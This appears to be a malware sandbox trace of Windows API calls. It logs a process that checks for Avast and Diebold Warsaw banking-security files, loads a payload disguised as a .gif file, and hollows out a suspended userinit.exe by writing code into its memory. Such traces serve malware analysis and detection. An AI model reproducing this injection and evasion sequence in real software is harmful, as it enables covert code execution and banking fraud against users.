[0117.356] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0117.356] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.356] GlobalUnlock (hMem=0x189000c) returned 0
[0117.356] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0117.356] GlobalUnlock (hMem=0x1890004) returned 0
[0117.363] Sleep (dwMilliseconds=0xe74e)
[0127.383] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0127.383] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0127.383] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0127.383] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0127.384] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108
[0127.384] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0127.384] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0127.384] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0127.384] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0127.386] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0127.386] ReadFile (in: hFile=0x108, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0127.389] CloseHandle (hObject=0x108) returned 1
[0127.390] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.390] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.390] GlobalUnlock (hMem=0x189000c) returned 0
[0127.390] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0127.390] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.391] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.391] GlobalUnlock (hMem=0x189000c) returned 0
[0127.391] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0127.392] GlobalLock (hMem=0x189000c) returned 0x25f110
[0127.393] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0127.393] GlobalUnlock (hMem=0x189000c) returned 0
[0127.393] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0127.393] GlobalLock (hMem=0x189000c) returned 0x265120
[0127.394] GlobalHandle (pMem=0x265120) returned 0x189000c
[0127.394] GlobalUnlock (hMem=0x189000c) returned 0
[0127.394] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0127.394] GlobalLock (hMem=0x189000c) returned 0x265120
[0127.395] GlobalHandle (pMem=0x265120) returned 0x189000c
[0127.395] GlobalUnlock (hMem=0x189000c) returned 0
[0127.395] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0127.396] GlobalLock (hMem=0x189000c) returned 0x26f130
[0127.397] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0127.397] GlobalUnlock (hMem=0x189000c) returned 0
[0127.397] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0127.397] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.397] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.397] GlobalUnlock (hMem=0x189000c) returned 0
[0127.397] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0127.397] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.398] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.398] GlobalUnlock (hMem=0x189000c) returned 0
[0127.398] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0127.398] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.399] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.399] GlobalUnlock (hMem=0x189000c) returned 0
[0127.399] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0127.399] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.399] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.399] GlobalUnlock (hMem=0x189000c) returned 0
[0127.400] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0127.400] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.400] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.400] GlobalUnlock (hMem=0x189000c) returned 0
[0127.400] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0127.400] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.401] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.401] GlobalUnlock (hMem=0x189000c) returned 0
[0127.401] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0127.401] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.402] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.402] GlobalUnlock (hMem=0x189000c) returned 0
[0127.402] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0127.402] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.402] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.402] GlobalUnlock (hMem=0x189000c) returned 0
[0127.402] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0127.402] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.403] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.403] GlobalUnlock (hMem=0x189000c) returned 0
[0127.403] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0127.403] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.404] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.404] GlobalUnlock (hMem=0x189000c) returned 0
[0127.404] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0127.405] GlobalLock (hMem=0x189000c) returned 0x27b110
[0127.406] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0127.406] GlobalUnlock (hMem=0x189000c) returned 0
[0127.406] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0127.406] GlobalLock (hMem=0x189000c) returned 0x27b110
[0127.407] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0127.407] GlobalUnlock (hMem=0x189000c) returned 0
[0127.407] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0127.409] GlobalLock (hMem=0x189000c) returned 0x29f120
[0127.410] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0127.410] GlobalUnlock (hMem=0x189000c) returned 0
[0127.410] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0127.410] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.411] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.411] GlobalUnlock (hMem=0x189000c) returned 0
[0127.411] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0127.411] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.411] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.411] GlobalUnlock (hMem=0x189000c) returned 0
[0127.411] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0127.411] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.412] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.412] GlobalUnlock (hMem=0x189000c) returned 0
[0127.412] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0127.412] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.413] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.413] GlobalUnlock (hMem=0x189000c) returned 0
[0127.413] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0127.413] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.414] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.414] GlobalUnlock (hMem=0x189000c) returned 0
[0127.414] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0127.414] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.415] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.415] GlobalUnlock (hMem=0x189000c) returned 0
[0127.415] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0127.415] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.415] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.415] GlobalUnlock (hMem=0x189000c) returned 0
[0127.415] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0127.415] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.416] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.416] GlobalUnlock (hMem=0x189000c) returned 0
[0127.416] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0127.416] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.417] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.417] GlobalUnlock (hMem=0x189000c) returned 0
[0127.417] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0127.417] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.418] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.418] GlobalUnlock (hMem=0x189000c) returned 0
[0127.418] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0127.418] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.419] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.419] GlobalUnlock (hMem=0x189000c) returned 0
[0127.419] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0127.419] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.419] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.419] GlobalUnlock (hMem=0x189000c) returned 0
[0127.419] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0127.419] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.420] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.420] GlobalUnlock (hMem=0x189000c) returned 0
[0127.420] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0127.420] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.421] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.421] GlobalUnlock (hMem=0x189000c) returned 0
[0127.421] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0127.421] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.422] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.422] GlobalUnlock (hMem=0x189000c) returned 0
[0127.422] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0127.422] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.422] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.422] GlobalUnlock (hMem=0x189000c) returned 0
[0127.422] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0127.422] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.423] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.423] GlobalUnlock (hMem=0x189000c) returned 0
[0127.423] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0127.423] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.424] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.424] GlobalUnlock (hMem=0x189000c) returned 0
[0127.424] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0127.424] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.424] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.424] GlobalUnlock (hMem=0x189000c) returned 0
[0127.424] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0127.424] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.425] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.425] GlobalUnlock (hMem=0x189000c) returned 0
[0127.425] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0127.425] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.426] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.426] GlobalUnlock (hMem=0x189000c) returned 0
[0127.426] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0127.426] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.427] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.427] GlobalUnlock (hMem=0x189000c) returned 0
[0127.427] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0127.427] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.427] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.427] GlobalUnlock (hMem=0x189000c) returned 0
[0127.427] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0127.427] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.428] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.428] GlobalUnlock (hMem=0x189000c) returned 0
[0127.428] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0127.428] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.429] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.429] GlobalUnlock (hMem=0x189000c) returned 0
[0127.429] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0127.429] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.477] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.477] GlobalUnlock (hMem=0x189000c) returned 0
[0127.477] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0127.477] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.477] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.477] GlobalUnlock (hMem=0x189000c) returned 0
[0127.477] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0127.477] GlobalLock (hMem=0x189000c) returned 0x25b100
[0127.478] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x104, hThread=0x108, dwProcessId=0x824, dwThreadId=0x764)) returned 1
[0127.480] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0127.480] GetThreadContext (in: hThread=0x108, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdd000, Edx=0x0, Ecx=0x0, Eax=0x6d2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x8fee8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0127.523] ReadProcessMemory (in: hProcess=0x104, lpBaseAddress=0x7ffdd008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0127.523] VirtualAllocEx (hProcess=0x104, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0127.524] VirtualAlloc (lpAddress=0x1a3c000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1a3c000
[0127.530] WriteProcessMemory (in: hProcess=0x104, lpBaseAddress=0x400000, lpBuffer=0x1a3997c*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1a3997c*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0127.542] WriteProcessMemory (in: hProcess=0x104, lpBaseAddress=0x7ffdd008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
